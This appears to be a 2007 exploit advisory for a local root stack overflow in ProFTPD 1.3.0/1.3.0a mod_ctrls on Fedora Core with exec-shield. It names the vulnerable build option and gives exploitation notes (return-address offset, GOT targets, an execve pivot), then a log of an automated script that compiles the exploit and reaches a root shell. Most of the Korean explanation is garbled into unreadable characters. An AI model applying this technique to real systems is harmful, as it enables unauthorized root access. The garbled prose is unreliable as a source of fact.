
proftpd 1.3.0, 1.3.0a mod_ctrls standalone daemon local `one shot' exploit
                                              in Fedora core 6 exec-shield
                                                        (c) Xpl017Elz 2007

(1) Overview

Core Security Technologies 2006 12, mod_ctrls Ȱ 
proftpd 1.3.0, 1.3.0a  stack overflow  ϴ 
߰Ͽ.

Advisory URL: http://www.coresecurity.com/?module=ContentMod&action=item&id=1594

 ִ  ֱ  Ⱓ exec-shield ϴ RedHat 迭
ü  standalone daemon exploit  ٴ ̴.
Դٰ װ  exploit鿡  ̽ļ 뼺 ,  ѹ
 Ѿ Ǵ exploit Ǳ     ϰ ִ.

̷ exec-shield   RedHat ýۿ stack  overflow 
ѹ ݿ  Ȯ ׸  ʴ. ̰ ׵  鿡
 Ǿ,   exec-shield ϴ ü remote exploit
پ ͵ ̴. ׷,  proftpd   ϵ
ϰڴ.

--enable-ctrls ɼ Ȱ proftpd 1.3.0 1.3.0a  local exploit
ϴ. ٸ, װ standalone daemon ϴ exploit̶ 
remote exploit ŭ Ű ƴٰ   ִ. ɼ Ȱ 
ftpdctl   Ȯ ϴ.

--enable-ctrls ɼ Ȱ :

--
$ /usr/local/bin/ftpdctl -h
usage: ftpdctl [options]
  -h    displays this message
  -s    specify an alternate local socket
  -v    displays more verbose information

$
--

Ȱ  :

--
$ ./ftpdctl -h
ftpdctl:
  Controls support disabled.
  Please recompile proftpd using --enable-ctrls
$
--

mod_ctrls   ڼ   URL ϱ ٶ.

http://www.castaglia.org/proftpd/modules/mod_ctrls.html

(2) Vulnerable Packages

proftpd-1.3.0 (stable)  - mod_ctrls compiled
proftpd-1.3.0a (stable) - mod_ctrls compiled

(3) Exploit

켱, exploit   ռ ѵ configure --enable-ctrls ɼ
Ͽ ġǾ Ѵٴ ̴. ׸ ڴ local   ־
Ѵ. ̰   ȯ̱  ݿ daemon ϴ ͺ
   local daemon exploit ̶   ִ.

-   Ʈ

1) mod_ctrl  ϵ proftpd daemon  standalone modeθ Ѵ.
   ׷, ڴ    exploit Ѿ ϴ  .

2) daemon  uid root(uid=0) , euid nobody 
   Ѵ. root  Ϸ, setuid() 迭 Լ Բ Ǿ Ѵ.
    , chmod() Լδ local ϴ Ͽ setuid  
   Ұϴ.

3) read() Լ   ޱ  buffer NULL Է ϴ.
    NULL Է  ȯ, random ϰ ϴ 16mb ̸ ּҸ
    ѹ  ϴ    Ұϴ.

4) local ftpdctl   ϴ  Էϴ  ϴ.
   ׷, 츮 exploit ftpdctl   ̴.

5)  FC5, FC6 ýۿ 540byte Ŀ  Լ %eip Ͱ
       ־.

6) proftpd  fork() Ǵ μ uid nobody  ʴ´.
   ռ, 2)  غϱ  exec family Լ  ϳ, execve()
   Լ ȣϿ ϴ  root   ̴.

7) (execve()>>16)&0xff  endpwent() Լ GOT ,
   (execve()>>8)&0xff  FC5  srand() Լ GOT, FC6 
   accept() Լ GOT  ´.

   getconf.sh ũƮ  ڵȭ exploit
ų  ִ.

--
[x82@localhost pr0ftpd]$ id
uid=500(x82) gid=500(x82) groups=500(x82)
[x82@localhost pr0ftpd]$ cat /etc/redhat-release
Fedora Core release 6 (Zod)
[x82@localhost pr0ftpd]$ ./getconf.sh
#
# proftpd 1.3.0, 1.3.0a mod_ctrls standalone daemon local root exploit
# by Xpl017Elz
#
# [+] check mod_ctrls install: [OK]
# [+] find os type: {1} - Fedora Core release 6 (Zod)
# [+] check proftpd binary /usr/local/sbin/proftpd: [OK]
# [+] strcpy()'s plt address: 0x0804a75c
# [+] 12byte %esp move code address: 0x804af7f
# [+] __libc_start_main()'s GOT address: 0x080b21d0
# [+] __libc_start_main()'s PLT address: 0x0804a45c
# [+] get 0xfc byte address (FC5): 0x80a4dda
# [+] virtual address start: 0x08048000
# [+] get null byte physical offset: 0x0000120
# [+] srand()'s GOT POINTER address (FC5): 0x080b2114
# [+] accept()'s GOT POINTER address (FC6): 0x080b2238
# [+] endpwent()'s GOT POINTER address: 0x080b2364
# [+] /tmp/ftp.cl path address: 0x80a9fd5
# [+] make header file
# [+] compile pr0ftpd_modctrls.c
# [*] execute pr0ftpd_modctrls
#
# [+] make shell
# [+] make payload
# [*] execute `/usr/local/bin/ftpdctl'
#
ftpdctl: error receiving response: Operation not permitted
#
# [+] remove files
# [*] exploit successfully!
# [*] It's root shell :-}
#
sh-3.1# id
uid=0(root) gid=0(root) groups=500(x82)
sh-3.1#
--

 ѹ   ࿡     ִ.

--
By "dong-houn yoU" (Xpl017Elz), in INetCop Security Co., LTD.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.net
             My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--

